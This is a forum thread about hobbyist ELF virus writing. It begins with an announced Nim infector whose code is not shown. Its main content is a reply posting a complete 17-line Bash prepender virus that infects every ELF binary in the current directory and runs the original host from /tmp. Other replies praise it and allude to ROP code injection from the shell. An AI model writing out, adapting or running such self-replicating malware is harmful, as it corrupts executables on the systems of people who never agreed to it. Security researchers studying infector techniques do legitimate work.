Linux.Cephei: a Nim virus


#1

This is a ELF infector I wrote while learning NimLang :slight_smile:


#2

I think you might have forgotten something here.


#3

yeah fixed… my clipboard has tricked me!


#4

Why Nim if I may ask?


#6

No specific reason, I like writing prependers in languages where they don’t exist and I find interesting. Nim got my attention


#8

Cool.

Your post would have much more value if you could explain the whys and hows behind your code. Alhough @0x00pf has already made a write-up on ELF infectors, don’t hesitate on giving us your own view point. Otherwise your post is nothing more than self-advertisement and fortunately or unfortunately, this site isn’t aimed for that.

I hope you understand,

Cheers!


#10

Sure, no problems with that :slight_smile: will try to do more than copying and pasting from my website, should be cool


(pico) #11

For the LuLZ :slight_smile:
This is a 17 LoC, multi-architecture virus (works on x86 -32/64bits-, ARM, MIPS, PowerPC,…). It increases the infected binary in less than 350 bytes!!!.

Feel the power of Bash!
Best language ever for virus development!!

#!/bin/bash
#AMiINFECTED

for f in *; do
        if [ ! -z `file $f|grep ELF|cut -d : -f 1` ]; then
                if [ -z `grep -a AMiNFECTED $f|head -n 1` ]; then
                        cp $f .b&&head -n 17 $0>.b&&cat $f>>.b&&mv .b $f
                fi
        fi
done

rm -f /tmp/.a&&tail -n +18 $0>/tmp/.a
if [ -s /tmp/.a ]; then
        echo "I'm an awesome bash virus"
        chmod +x /tmp/.a&&/tmp/.a
fi
exit


(Command-Line Ninja) #12

I must say, this is the coolest thing I have ever seen.

An ELF file injector in bash. I feel as if this needs its own topic. I have to share this nonetheless.

Mind == Blown.


(pico) #13

@pry0cc, you really have to check this… code injection using ROP without ptrace from BASH!

Do not underestimate the power of the shell!! :slight_smile: